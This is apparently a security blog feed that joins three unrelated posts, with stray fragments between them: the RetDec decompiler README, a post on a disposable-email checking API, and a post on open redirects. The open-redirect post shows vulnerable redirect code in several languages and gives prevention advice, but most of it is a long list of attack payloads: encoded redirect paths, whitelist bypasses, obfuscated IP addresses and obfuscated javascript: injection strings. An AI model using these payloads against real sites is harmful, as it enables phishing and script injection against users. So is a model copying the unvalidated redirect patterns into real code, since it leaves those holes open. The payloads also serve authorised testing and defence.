
RetDec - A Retargetable Machine-Code Decompiler Based On LLVM


RetDec is a retargetable machine-code decompiler based on LLVM.
The decompiler is not limited to any particular target architecture, operating system, or executable file format:
  • Supported file formats: ELF, PE, Mach-O, COFF, AR (archive), Intel HEX, and raw machine code
  • Supported architectures:
    • 32-bit: Intel x86, ARM, MIPS, PIC32, and PowerPC
    • 64-bit: x86-64, ARM64 (AArch64)
Features:
  • Static analysis of executable files with detailed information.
  • Compiler and packer detection.
  • Loading and instruction decoding.
  • Signature-based removal of statically linked library code.
  • Extraction and utilization of debugging information (DWARF, PDB).
  • Reconstruction of instruction idioms.
  • Detection and reconstruction of C++ class hierarchies (RTTI, vtables).
  • Demangling of symbols from C++ binaries (GCC, MSVC, Borland).
  • Reconstruction of functions, types, and high-level constructs.
  • Integrated disassembler.
  • Output in two high-level languages: C and a Python-like language.
  • Generation of call graphs, control-flow graphs, and various statistics.
For more information, check out the project's wiki.

Installation and Use
Currently, we support Windows (7 or later), Linux, macOS, and (experimentally) FreeBSD. An installed version of RetDec requires approximately 4 GB of free disk space.

Windows
  1. Either download and unpack a pre-built package, or build and install the decompiler by yourself (the process is described below).
  2. Install Microsoft Visual C++ Redistributable for Visual Studio 2015.
  3. Install the following programs:
    • Python (version >= 3.4)
    • UPX (Optional: if you want to use UPX unpacker in the preprocessing stage)
    • Graphviz (Optional: if you want to generate call or control flow graphs)
  4. Now, you are all set to run the decompiler. To decompile a binary file named test.exe, run the following command (ensure that python runs Python 3; as an alternative, you can try py -3):
    python $RETDEC_INSTALL_DIR/bin/retdec-decompiler.py test.exe
    For more information, run retdec-decompiler.py with --help.

Linux
  1. Either download and unpack a pre-built package, or build and install the decompiler by yourself (the process is described below).
  2. After you have built the decompiler, you will need to install the following packages via your distribution's package manager:
    • Python (version >= 3.4)
    • UPX (Optional: if you want to use UPX unpacker in the preprocessing stage)
    • Graphviz (Optional: if you want to generate call or control flow graphs)
  3. Now, you are all set to run the decompiler. To decompile a binary file named test.exe, run
    $RETDEC_INSTALL_DIR/bin/retdec-decompiler.py test.exe
    For more information, run retdec-decompiler.py with --help.

macOS
  1. Either download and unpack a pre-built package, or build and install the decompiler by yourself (the process is described below).
  2. After you have built the decompiler, you will need to install the following packages:
    • Python (version >= 3.4)
    • UPX (Optional: if you want to use UPX unpacker in the preprocessing stage)
    • Graphviz (Optional: if you want to generate call or control flow graphs)
  3. Now, you are all set to run the decompiler. To decompile a binary file named test.exe, run
    $RETDEC_INSTALL_DIR/bin/retdec-decompiler.py test.exe
    For more information, run retdec-decompiler.py with --help.

FreeBSD (Experimental)
  1. There are currently no pre-built "ports" packages for FreeBSD. You will have to build and install the decompiler by yourself. The process is described below.
  2. After you have built the decompiler, you may need to install the following packages and execute the following commands:
    sudo pkg install python37
    sudo ln -s /usr/local/bin/python3.7 /usr/local/bin/python3
  3. Now, you are all set to run the decompiler. To decompile a binary file named test.exe, run
    $RETDEC_INSTALL_DIR/bin/retdec-decompiler.py test.exe
    For more information, run retdec-decompiler.py with --help.

Build and Installation
This section describes a local build and installation of RetDec. Instructions for Docker are given in the next section.

Requirements

Linux
On Debian-based distributions (e.g. Ubuntu), the required packages can be installed with apt-get:
sudo apt-get install build-essential cmake git perl python3 bison flex libfl-dev autoconf automake libtool pkg-config m4 zlib1g-dev upx doxygen graphviz
On RPM-based distributions (e.g. Fedora), the required packages can be installed with dnf:
sudo dnf install gcc gcc-c++ cmake make git perl python3 bison flex autoconf automake libtool pkg-config m4 zlib-devel upx doxygen graphviz
On Arch Linux, the required packages can be installed with pacman:
sudo pacman --needed -S base-devel cmake git perl python3 bison flex autoconf automake libtool pkg-config m4 zlib upx doxygen graphviz

Windows
  • Microsoft Visual C++ (version >= Visual Studio 2015 Update 2)
  • CMake (version >= 3.6)
  • Git
  • Flex + Bison from the Win flex-bison project. Add the extracted directory to the system Path.
  • Active Perl. It needs to be the first Perl in PATH, or it has to be provided to CMake using the CMAKE_PROGRAM_PATH variable, e.g. -DCMAKE_PROGRAM_PATH=/c/perl/bin. Does NOT work with Strawberry Perl or MSYS2 Perl (you would have to install a pre-built version of OpenSSL, see below).
    • Alternatively, you can install a pre-built OpenSSL directly. This means OpenSSL won't be built and you don't need to install any Perl. Do not install the Light version of OpenSSL, as it doesn't contain development files.
  • Python (version >= 3.4)
  • Optional: Doxygen and Graphviz for generating API documentation

macOS
Packages should preferably be installed via Homebrew.

FreeBSD (Experimental)
Packages should be installed via FreeBSD's pre-compiled package repository using the pkg command, or built from scratch using the ports database method.
  • Full "pkg" tool instructions: handbook pkg method
    • pkg install cmake python37 bison git autotools
  • Alternatively, full "ports" instructions: handbook ports method
    • portsnap fetch
    • portsnap extract
  • For example, building cmake from the ports tree:
    • whereis cmake
    • cd /usr/ports/devel/cmake
    • make install clean

Process
Note: Although RetDec now supports a system-wide installation (#94), unless you use your distribution's package manager to install it, we recommend installing RetDec locally into a designated directory. The reason for this is that uninstallation will be easier: you will only need to remove a single directory. To perform a local installation, run cmake with the -DCMAKE_INSTALL_PREFIX=<path> parameter, where <path> is the directory into which RetDec will be installed (e.g. $HOME/projects/retdec-install on Linux and macOS, and C:\projects\retdec-install on Windows).
  • Clone the repository:
    • git clone https://github.com/avast/retdec
  • Linux:
    • cd retdec
    • mkdir build && cd build
    • cmake .. -DCMAKE_INSTALL_PREFIX=<path>
    • make -jN (N is the number of processes to use for a parallel build; typically, the number of cores + 1 gives the fastest compilation time)
    • make install
  • Windows:
    • Open a command prompt (e.g. cmd.exe)
    • cd retdec
    • mkdir build && cd build
    • cmake .. -DCMAKE_INSTALL_PREFIX=<path> -G<generator>
    • cmake --build . --config Release -- -m
    • cmake --build . --config Release --target install
    • Alternatively, you can open retdec.sln generated by cmake in Visual Studio IDE
  • macOS:
    • cd retdec
    • mkdir build && cd build
    • # Apple ships old Flex & Bison, so Homebrew versions should be used.
      export CMAKE_INCLUDE_PATH="/usr/local/opt/flex/include"
      export CMAKE_LIBRARY_PATH="/usr/local/opt/flex/lib;/usr/local/opt/bison/lib"
      export PATH="/usr/local/opt/flex/bin:/usr/local/opt/bison/bin:$PATH"
    • cmake .. -DCMAKE_INSTALL_PREFIX=<path>
    • make -jN (N is the number of processes to use for a parallel build; typically, the number of cores + 1 gives the fastest compilation time)
    • make install
  • FreeBSD:
    • sudo pkg install git cmake
    • git clone https://github.com/avast/retdec
    • cd retdec
    • mkdir build && cd build
    • # FreeBSD (and other BSDs) needs cmake, python3, bison, git, and autotools. Flex and Perl are pre-installed in the OS, but check their versions.
      # Later versions may be available for each of the packages.
      # See what is installed:
      sudo pkg info cmake python37 bison autotools
      # Install/upgrade them:
      sudo pkg install cmake python37 bison autotools
    • cmake .. -DCMAKE_INSTALL_PREFIX=<path>
    • make -jN (N is the number of processes to use for a parallel build; typically, the number of cores + 1 gives the fastest compilation time)
    • make install
You have to pass the following parameters to cmake:
  • -DCMAKE_INSTALL_PREFIX=<path> to set the installation path to <path>. Quote the path if you are using backslashes on Windows (e.g. -DCMAKE_INSTALL_PREFIX="C:\retdec").
  • (Windows only) -G<generator> is -G"Visual Studio 14 2015" for 32-bit build using Visual Studio 2015, or -G"Visual Studio 14 2015 Win64" for 64-bit build using Visual Studio 2015. Later versions of Visual Studio may be used.
You can pass the following additional parameters to cmake:
  • -DRETDEC_DOC=ON to build with API documentation (requires Doxygen and Graphviz, disabled by default).
  • -DRETDEC_TESTS=ON to build with tests (disabled by default).
  • -DRETDEC_DEV_TOOLS=ON to build with development tools (disabled by default).
  • -DRETDEC_FORCE_OPENSSL_BUILD=ON to force OpenSSL build even if it is installed in the system (disabled by default).
  • -DRETDEC_COMPILE_YARA=OFF to disable YARA rules compilation at the installation step (enabled by default).
  • -DCMAKE_BUILD_TYPE=Debug to build with debugging information, which is useful during development. By default, the project is built in Release mode. This has no effect on Windows, but the same thing can be achieved by running cmake --build . with the --config Debug parameter.
  • -DCMAKE_PROGRAM_PATH=<path> to use Perl at <path> (probably useful only on Windows).
  • -D<dep>_LOCAL_DIR=<path> where <dep> is from {CAPSTONE, ELFIO, GOOGLETEST, JSONCPP, KEYSTONE, LIBDWARF, LLVM, PELIB, RAPIDJSON, TINYXML, YARACPP, YARAMOD} (e.g. -DCAPSTONE_LOCAL_DIR=<path>), to use the local repository clone at <path> for RetDec dependency instead of downloading a fresh copy at build time. Multiple such options may be used at the same time.
  • -DRETDEC_ENABLE_<component>=ON to build only the specified component(s) (multiple such options can be used at once) and their dependencies. By default, all the components are built. If at least one component is enabled via this mechanism, all the other components that were not explicitly enabled (and are not needed as dependencies of enabled components) are not built. See cmake/options.cmake for all the available component options.
    • -DRETDEC_ENABLE_ALL=ON can be used to (re-)enable all the components.
    • Alternatively, -DRETDEC_ENABLE=<comma-separated component list> can be used instead of -DRETDEC_ENABLE_<component>=ON (e.g. -DRETDEC_ENABLE=fileformat,loader,ctypesparser is equivalent to -DRETDEC_ENABLE_FILEFORMAT=ON -DRETDEC_ENABLE_LOADER=ON -DRETDEC_ENABLE_CTYPESPARSER=ON).
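For example, a local Linux configuration that installs into $HOME/projects/retdec-install and additionally builds the tests and development tools (the path is illustrative; the flags are those documented above) could look like this:
cmake .. -DCMAKE_INSTALL_PREFIX=$HOME/projects/retdec-install -DRETDEC_TESTS=ON -DRETDEC_DEV_TOOLS=ON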

Build in Docker
Docker support is maintained by the community. If something does not work for you or if you have suggestions for improvements, open an issue or PR.

Build Image
Building in Docker does not require installation of the required libraries locally. This is a good option for trying out RetDec without setting up the whole build toolchain.
To build the RetDec Docker image, run
docker build -t retdec - < Dockerfile
This builds the image from the master branch of this repository.
To build the image using the local copy of the repository, use the development Dockerfile, Dockerfile.dev:
docker build -t retdec:dev . -f Dockerfile.dev

Run Container
If your uid is not 1000, make sure that the directory containing your input binary files is accessible to RetDec:
chmod 0777 /path/to/local/directory
Now, you can run the decompiler inside a container:
docker run --rm -v /path/to/local/directory:/destination retdec retdec-decompiler.py /destination/binary
Note: Do not modify the /destination part. You only need to change /path/to/local/directory. Output files will then be generated into /path/to/local/directory.

Automated TeamCity Builds
Our TeamCity servers are continuously generating up-to-date RetDec packages from the latest commit in the master branch. These are mostly meant to be used by RetDec developers, contributors, and other people experimenting with the product (e.g. testing if an issue present in the official release still exists in the current master).
You can use these as you wish, but keep in mind that there are no guarantees they will work on your system (especially the Linux version), and that regressions are a possibility. To get a stable RetDec version, either download the latest official pre-built package or build the latest RetDec version tag.

Repository Overview
This repository contains the following libraries:
  • ar-extractor - library for extracting object files from archives (based on LLVM).
  • bin2llvmir - library of LLVM passes for translating binaries into LLVM IR modules.
  • capstone2llvmir - binary instructions to LLVM IR translation library.
  • config - library for representing and managing RetDec configuration databases.
  • cpdetect - library for compiler and packer detection in binaries.
  • crypto - collection of cryptographic functions.
  • ctypes - C++ library for representing C function data types.
  • debugformat - library for uniform representation of DWARF and PDB debugging information.
  • demangler - demangling library capable of handling names generated by the GCC/Clang, Microsoft Visual C++, and Borland C++ compilers.
  • dwarfparser - library for high-level representation of DWARF debugging information.
  • fileformat - library for parsing and uniform representation of various object file formats. Currently supporting the following formats: COFF, ELF, Intel HEX, Mach-O, PE, raw data.
  • llvm-support - set of LLVM related utility functions.
  • llvmir-emul - LLVM IR emulation library used for unit testing.
  • llvmir2hll - library for translating LLVM IR modules to high-level source codes (C, Python-like language).
  • loader - library for uniform representation of binaries loaded to memory. Supports the same formats as fileformat.
  • macho-extractor - library for extracting regular Mach-O binaries from fat Mach-O binaries (based on LLVM).
  • patterngen - binary pattern extractor library.
  • pdbparser - Microsoft PDB files parser library.
  • stacofin - static code finder library.
  • unpacker - collection of unpacking functions.
  • utils - general C++ utility library.
This repository contains the following tools:
  • ar-extractortool - frontend for the ar-extractor library (installed as retdec-ar-extractor).
  • bin2llvmirtool - frontend for the bin2llvmir library (installed as retdec-bin2llvmir).
  • bin2pat - tool for generating patterns from binaries (installed as retdec-bin2pat).
  • capstone2llvmirtool - frontend for the capstone2llvmir library (installed as retdec-capstone2llvmir).
  • configtool - frontend for the config library (installed as retdec-config).
  • ctypesparser - C++ library for parsing C function data types from JSON files into ctypes representation (installed as retdec-ctypesparser).
  • demangler_grammar_gen - tool for generating new grammars for the demangler library (installed as retdec-demangler-grammar-gen).
  • demanglertool - frontend for the demangler library (installed as retdec-demangler).
  • fileinfo - binary analysis tool. Supports the same formats as fileformat (installed as retdec-fileinfo).
  • idr2pat - tool for extracting patterns from IDR knowledge bases (installed as retdec-idr2pat).
  • llvmir2hlltool - frontend for the llvmir2hll library (installed as retdec-llvmir2hll).
  • macho-extractortool - frontend for the macho-extractor library (installed as retdec-macho-extractor).
  • pat2yara - tool for processing patterns to YARA signatures (installed as retdec-pat2yara).
  • stacofintool - frontend for the stacofin library (installed as retdec-stacofin).
  • unpackertool - plugin-based unpacker (installed as retdec-unpacker).
This repository contains the following scripts:
  • retdec-decompiler.py - the main decompilation script binding it all together. This is the tool to use for full binary-to-C decompilations.
  • Support scripts used by retdec-decompiler.py:
    • retdec-color-c.py - decorates output C sources with IDA color tags - syntax highlighting for IDA.
    • retdec-config.py - decompiler's configuration file.
    • retdec-archive-decompiler.py - decompiles objects in the given AR archive.
    • retdec-fileinfo.py - a Fileinfo tool wrapper.
    • retdec-signature-from-library-creator.py - extracts function signatures from the given library.
    • retdec-unpacker.py - tries to unpack the given executable file by using any of the supported unpackers.
    • retdec-utils.py - a collection of Python utilities.
  • retdec-tests-runner.py - run all tests in the unit test directory.
  • type_extractor - generation of type information (for internal use only)

Project Documentation
See the project documentation for an up-to-date Doxygen-generated software reference corresponding to the latest commit in the master branch.

License
Copyright (c) 2017 Avast Software, licensed under the MIT license. See the LICENSE file for more details.
RetDec uses third-party libraries or other resources listed, along with their licenses, in the LICENSE-THIRD-PARTY file.

Contributing
See RetDec contribution guidelines.

Acknowledgements
This software was supported by research funding from TACR (Technology Agency of the Czech Republic), ALFA Programme No. TA01010667.



AntiDisposmail - Detecting Disposable Email Addresses


Antibot.pw provides a free, open API endpoint for checking a domain or email address against a frequently-updated list of disposable domains. CORS is enabled for all originating domains, so you can call the API directly from your client-side code.
GET https://antibot.pw/api/disposable?email=radenvodka@0815.su HTTP/1.1
The response will be JSON with one boolean property, e.g. {"disposable":false}
Using jQuery?

<script>
  // Check the address against the API whenever the email field changes.
  $("#email").change(function () {
    var val = $("#email").val();
    $.get('https://antibot.pw/api/disposable?email=' + val,
      function (data, textStatus) {
        if (data['disposable'] === true) {
          alert("email disposable");
        }
      });
  });
</script>
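The same check can be done server-side; here is a minimal Python sketch (using the third-party requests library; the endpoint and the disposable response field are exactly as documented above):

import requests

def is_disposable(email):
    # Query the antibot.pw API; it returns JSON like {"disposable": false}.
    resp = requests.get("https://antibot.pw/api/disposable",
                        params={"email": email}, timeout=5)
    resp.raise_for_status()
    return resp.json()["disposable"]

print(is_disposable("radenvodka@0815.su"))  # the example address used above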


Open Redirect Payload List

$
0
0

Unvalidated redirects and forwards are possible when a web application accepts untrusted input that causes it to redirect the request to a URL contained within that input. By modifying untrusted URL input to point to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials.
Because the server name in the modified link is identical to the original site, phishing attempts may have a more trustworthy appearance. Unvalidated redirect and forward attacks can also be used to maliciously craft a URL that would pass the application’s access control check and then forward the attacker to privileged functions that they would normally not be able to access.

Java :
response.sendRedirect("http://www.mysite.com");  

PHP :
<?php
/* Redirect browser */
header("Location: http://www.mysite.com");
?>

ASP .NET :
Response.Redirect("~/folder/Login.aspx")

Rails :
redirect_to login_path
In the examples above, the URL is being explicitly declared in the code and cannot be manipulated by an attacker.

Dangerous URL Redirects
The following examples demonstrate unsafe redirect and forward code.

Dangerous URL Redirect Example 1
The following Java code receives the URL from the parameter named url (GET or POST) and redirects to that URL:
response.sendRedirect(request.getParameter("url"));
The following PHP code obtains a URL from the query string (via the parameter named url) and then redirects the user to that URL:
$redirect_url = $_GET['url'];
header("Location: " . $redirect_url);
A similar example of C# .NET Vulnerable Code:
string url = request.QueryString["url"];
Response.Redirect(url);
And in Rails:
redirect_to params[:url]
The above code is vulnerable to attack if no validation or extra method controls are applied to verify the legitimacy of the URL. This vulnerability could be used as part of a phishing scam by redirecting users to a malicious site.
If no validation is applied, a malicious user could create a hyperlink to redirect your users to an unvalidated malicious website, for example:
http://example.com/example.php?url=http://malicious.example.com
The user sees the link pointing to the original trusted site (example.com) and does not realize that a redirection could take place.

Dangerous URL Redirect Example 2
ASP .NET MVC 1 & 2 websites are particularly vulnerable to open redirection attacks. To avoid this vulnerability, you need to upgrade to ASP.NET MVC 3 or later, which provides Url.IsLocalUrl() for validating return URLs.
The code for the LogOn action in an ASP.NET MVC 2 application is shown below. After a successful login, the controller returns a redirect to the returnUrl. You can see that no validation is being performed against the returnUrl parameter.
ASP.NET MVC 2 LogOn action in AccountController.cs:
[HttpPost]
public ActionResult LogOn(LogOnModel model, string returnUrl)
{
    if (ModelState.IsValid)
    {
        if (MembershipService.ValidateUser(model.UserName, model.Password))
        {
            FormsService.SignIn(model.UserName, model.RememberMe);
            if (!String.IsNullOrEmpty(returnUrl))
            {
                return Redirect(returnUrl);
            }
            else
            {
                return RedirectToAction("Index", "Home");
            }
        }
        else
        {
            ModelState.AddModelError("", "The user name or password provided is incorrect.");
        }
    }

    // If we got this far, something failed, redisplay form
    return View(model);
}

Preventing Unvalidated Redirects and Forwards
Safe use of redirects and forwards can be done in a number of ways:
  • Simply avoid using redirects and forwards.
  • If used, do not allow the URL as user input for the destination. This can usually be done; in that case, you should have a server-side method that determines the destination.
  • If user input can't be avoided, ensure that the supplied value is valid, appropriate for the application, and authorized for the user.
  • It is recommended that any such destination input be mapped to a value, rather than the actual URL or a portion of it, and that server-side code translate this value to the target URL.
  • Sanitize input by maintaining a list of trusted URLs (a list of hosts or a regex), as in the sketch after this list.
  • Force all redirects to first go through a page notifying users that they are going off of your site, and have them click a link to confirm.
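As an illustration of the allow-list approach, here is a minimal Python sketch (the ALLOWED_HOSTS set and the function name are hypothetical). It rejects dangerous schemes such as javascript: and data:, protocol-relative //host URLs, and backslash tricks, all of which appear in the payload list below:

from urllib.parse import urlparse

# Hypothetical allow-list; adapt to your own hosts.
ALLOWED_HOSTS = {"www.example.com", "example.com"}

def is_safe_redirect(url):
    # Browsers normalize "\" to "/", so "/\/evil.com" becomes "//evil.com";
    # reject backslashes outright.
    if "\\" in url:
        return False
    parsed = urlparse(url)
    if parsed.scheme in ("http", "https"):
        # Absolute URL: the host must be allow-listed. This also rejects
        # "https:google.com" (empty netloc here, though browsers fill it in).
        return parsed.netloc in ALLOWED_HOSTS
    if parsed.scheme:
        # javascript:, data:, and every other scheme are rejected.
        return False
    # Scheme-less input: "//evil.com" carries a netloc and must be allow-listed.
    return not parsed.netloc or parsed.netloc in ALLOWED_HOSTS

Even with such checks, mapping destinations to server-side identifiers (as recommended above) is more robust than parsing, because several payloads below are crafted specifically to make the application's parser and the browser disagree.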

Open Redirect Payload List :
/%09/example.com
/%2f%2fexample.com
/%2f%2f%2fbing.com%2f%3fwww.omise.co
/%2f%5c%2f%67%6f%6f%67%6c%65%2e%63%6f%6d/
/%5cexample.com
/%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
/.example.com
//%09/example.com
//%5cexample.com
///%09/example.com
///%5cexample.com
////%09/example.com
////%5cexample.com
/////example.com
/////example.com/
////\;@example.com
////example.com/
////example.com/%2e%2e
////example.com/%2e%2e%2f
////example.com/%2f%2e%2e
////example.com/%2f..
////example.com//
///\;@example.com
///example.com
///example.com/
//google.com/%2f..
//www.whitelisteddomain.tld@google.com/%2f..
///google.com/%2f..
///www.whitelisteddomain.tld@google.com/%2f..
////google.com/%2f..
////www.whitelisteddomain.tld@google.com/%2f..
https://google.com/%2f..
https://www.whitelisteddomain.tld@google.com/%2f..
/https://google.com/%2f..
/https://www.whitelisteddomain.tld@google.com/%2f..
//www.google.com/%2f%2e%2e
//www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
///www.google.com/%2f%2e%2e
///www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
////www.google.com/%2f%2e%2e
////www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
https://www.google.com/%2f%2e%2e
https://www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
/https://www.google.com/%2f%2e%2e
/https://www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
//google.com/
//www.whitelisteddomain.tld@google.com/
///google.com/
///www.whitelisteddomain.tld@google.com/
////google.com/
////www.whitelisteddomain.tld@google.com/
https://google.com/
https://www.whitelisteddomain.tld@google.com/
/https://google.com/
/https://www.whitelisteddomain.tld@google.com/
//google.com//
//www.whitelisteddomain.tld@google.com//
///google.com//
///www.whitelisteddomain.tld@google.com//
////google.com//
////www.whitelisteddomain.tld@google.com//
https://google.com//
https://www.whitelisteddomain.tld@google.com//
//https://google.com//
//https://www.whitelisteddomain.tld@google.com//
//www.google.com/%2e%2e%2f
//www.whitelisteddomain.tld@www.google.com/%2e%2e%2f
///www.google.com/%2e%2e%2f
///www.whitelisteddomain.tld@www.google.com/%2e%2e%2f
////www.google.com/%2e%2e%2f
////www.whitelisteddomain.tld@www.google.com/%2e%2e%2f
https://www.google.com/%2e%2e%2f
https://www.whitelisteddomain.tld@www.google.com/%2e%2e%2f
//https://www.google.com/%2e%2e%2f
//https://www.whitelisteddomain.tld@www.google.com/%2e%2e%2f
///www.google.com/%2e%2e
///www.whitelisteddomain.tld@www.google.com/%2e%2e
////www.google.com/%2e%2e
////www.whitelisteddomain.tld@www.google.com/%2e%2e
https:///www.google.com/%2e%2e
https:///www.whitelisteddomain.tld@www.google.com/%2e%2e
//https:///www.google.com/%2e%2e
//www.whitelisteddomain.tld@https:///www.google.com/%2e%2e
/https://www.google.com/%2e%2e
/https://www.whitelisteddomain.tld@www.google.com/%2e%2e
///www.google.com/%2f%2e%2e
///www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
////www.google.com/%2f%2e%2e
////www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
https:///www.google.com/%2f%2e%2e
https:///www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
/https://www.google.com/%2f%2e%2e
/https://www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
/https:///www.google.com/%2f%2e%2e
/https:///www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
/%09/google.com
/%09/www.whitelisteddomain.tld@google.com
//%09/google.com
//%09/www.whitelisteddomain.tld@google.com
///%09/google.com
///%09/www.whitelisteddomain.tld@google.com
////%09/google.com
////%09/www.whitelisteddomain.tld@google.com
https://%09/google.com
https://%09/www.whitelisteddomain.tld@google.com
/%5cgoogle.com
/%5cwww.whitelisteddomain.tld@google.com
//%5cgoogle.com
//%5cwww.whitelisteddomain.tld@google.com
///%5cgoogle.com
///%5cwww.whitelisteddomain.tld@google.com
////%5cgoogle.com
////%5cwww.whitelisteddomain.tld@google.com
https://%5cgoogle.com
https://%5cwww.whitelisteddomain.tld@google.com
/https://%5cgoogle.com
/https://%5cwww.whitelisteddomain.tld@google.com
https://google.com
https://www.whitelisteddomain.tld@google.com
javascript:alert(1);
javascript:alert(1)
//javascript:alert(1);
/javascript:alert(1);
//javascript:alert(1)
/javascript:alert(1)
/%5cjavascript:alert(1);
/%5cjavascript:alert(1)
//%5cjavascript:alert(1);
//%5cjavascript:alert(1)
/%09/javascript:alert(1);
/%09/javascript:alert(1)
java%0d%0ascript%0d%0a:alert(0)
//google.com
https:google.com
//google%E3%80%82com
\/\/google.com/
/\/google.com/
//google.com
https://www.whitelisteddomain.tld/https://www.google.com/
";alert(0);//
javascript://www.whitelisteddomain.tld?%a0alert%281%29
http://0xd8.0x3a.0xd6.0xce
http://www.whitelisteddomain.tld@0xd8.0x3a.0xd6.0xce
http://3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce
http://XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce
http://0xd83ad6ce
http://www.whitelisteddomain.tld@0xd83ad6ce
http://3H6k7lIAiqjfNeN@0xd83ad6ce
http://XY>.7d8T\205pZM@0xd83ad6ce
http://3627734734
http://www.whitelisteddomain.tld@3627734734
http://3H6k7lIAiqjfNeN@3627734734
http://XY>.7d8T\205pZM@3627734734
http://472.314.470.462
http://www.whitelisteddomain.tld@472.314.470.462
http://3H6k7lIAiqjfNeN@472.314.470.462
http://XY>.7d8T\205pZM@472.314.470.462
http://0330.072.0326.0316
http://www.whitelisteddomain.tld@0330.072.0326.0316
http://3H6k7lIAiqjfNeN@0330.072.0326.0316
http://XY>.7d8T\205pZM@0330.072.0326.0316
http://00330.00072.0000326.00000316
http://www.whitelisteddomain.tld@00330.00072.0000326.00000316
http://3H6k7lIAiqjfNeN@00330.00072.0000326.00000316
http://XY>.7d8T\205pZM@00330.00072.0000326.00000316
http://[::216.58.214.206]
http://www.whitelisteddomain.tld@[::216.58.214.206]
http://3H6k7lIAiqjfNeN@[::216.58.214.206]
http://XY>.7d8T\205pZM@[::216.58.214.206]
http://[::ffff:216.58.214.206]
http://www.whitelisteddomain.tld@[::ffff:216.58.214.206]
http://3H6k7lIAiqjfNeN@[::ffff:216.58.214.206]
http://XY>.7d8T\205pZM@[::ffff:216.58.214.206]
http://0xd8.072.54990
http://www.whitelisteddomain.tld@0xd8.072.54990
http://3H6k7lIAiqjfNeN@0xd8.072.54990
http://XY>.7d8T\205pZM@0xd8.072.54990
http://0xd8.3856078
http://www.whitelisteddomain.tld@0xd8.3856078
http://3H6k7lIAiqjfNeN@0xd8.3856078
http://XY>.7d8T\205pZM@0xd8.3856078
http://00330.3856078
http://www.whitelisteddomain.tld@00330.3856078
http://3H6k7lIAiqjfNeN@00330.3856078
http://XY>.7d8T\205pZM@00330.3856078
http://00330.0x3a.54990
http://www.whitelisteddomain.tld@00330.0x3a.54990
http://3H6k7lIAiqjfNeN@00330.0x3a.54990
http://XY>.7d8T\205pZM@00330.0x3a.54990
http:0xd8.0x3a.0xd6.0xce
http:www.whitelisteddomain.tld@0xd8.0x3a.0xd6.0xce
http:3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce
http:XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce
http:0xd83ad6ce
http:www.whitelisteddomain.tld@0xd83ad6ce
http:3H6k7lIAiqjfNeN@0xd83ad6ce
http:XY>.7d8T\205pZM@0xd83ad6ce
http:3627734734
http:www.whitelisteddomain.tld@3627734734
http:3H6k7lIAiqjfNeN@3627734734
http:XY>.7d8T\205pZM@3627734734
http:472.314.470.462
http:www.whitelisteddomain.tld@472.314.470.462
http:3H6k7lIAiqjfNeN@472.314.470.462
http:XY>.7d8T\205pZM@472.314.470.462
http:0330.072.0326.0316
http:www.whitelisteddomain.tld@0330.072.0326.0316
http:3H6k7lIAiqjfNeN@0330.072.0326.0316
http:XY>.7d8T\205pZM@0330.072.0326.0316
http:00330.00072.0000326.00000316
http:www.whitelisteddomain.tld@00330.00072.0000326.00000316
http:3H6k7lIAiqjfNeN@00330.00072.0000326.00000316
http:XY>.7d8T\205pZM@00330.00072.0000326.00000316
http:[::216.58.214.206]
http:www.whitelisteddomain.tld@[::216.58.214.206]
http:3H6k7lIAiqjfNeN@[::216.58.214.206]
http:XY>.7d8T\205pZM@[::216.58.214.206]
http:[::ffff:216.58.214.206]
http:www.whitelisteddomain.tld@[::ffff:216.58.214.206]
http:3H6k7lIAiqjfNeN@[::ffff:216.58.214.206]
http:XY>.7d8T\205pZM@[::ffff:216.58.214.206]
http:0xd8.072.54990
http:www.whitelisteddomain.tld@0xd8.072.54990
http:3H6k7lIAiqjfNeN@0xd8.072.54990
http:XY>.7d8T\205pZM@0xd8.072.54990
http:0xd8.3856078
http:www.whitelisteddomain.tld@0xd8.3856078
http:3H6k7lIAiqjfNeN@0xd8.3856078
http:XY>.7d8T\205pZM@0xd8.3856078
http:00330.3856078
http:www.whitelisteddomain.tld@00330.3856078
http:3H6k7lIAiqjfNeN@00330.3856078
http:XY>.7d8T\205pZM@00330.3856078
http:00330.0x3a.54990
http:www.whitelisteddomain.tld@00330.0x3a.54990
http:3H6k7lIAiqjfNeN@00330.0x3a.54990
http:XY>.7d8T\205pZM@00330.0x3a.54990
〱google.com
〵google.com
ゝgoogle.com
ーgoogle.com
ーgoogle.com
/〱google.com
/〵google.com
/ゝgoogle.com
/ーgoogle.com
/ーgoogle.com
%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
http://%67%6f%6f%67%6c%65%2e%63%6f%6d
<>javascript:alert(1);
<>//google.com
//google.com\@www.whitelisteddomain.tld
https://:@google.com\@www.whitelisteddomain.tld
\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)
\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)
ja\nva\tscript\r:alert(1)
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
\152\141\166\141\163\143\162\151\160\164\072alert(1)
http://google.com:80#@www.whitelisteddomain.tld/
http://google.com:80?@www.whitelisteddomain.tld/
///example.com/%2e%2e
///example.com/%2e%2e%2f
///example.com/%2f%2e%2e
///example.com/%2f..
///example.com//
//example.com
//example.com/
//example.com/%2e%2e
//example.com/%2e%2e%2f
//example.com/%2f%2e%2e
//example.com/%2f..
//example.com//
//google.com
//google%E3%80%82com
//https:///example.com/%2e%2e
//https://example.com/%2e%2e%2f
//https://example.com//
/<>//example.com
/?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com&redirect_uri=//example.com
/?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redirect_uri=/\/example.com
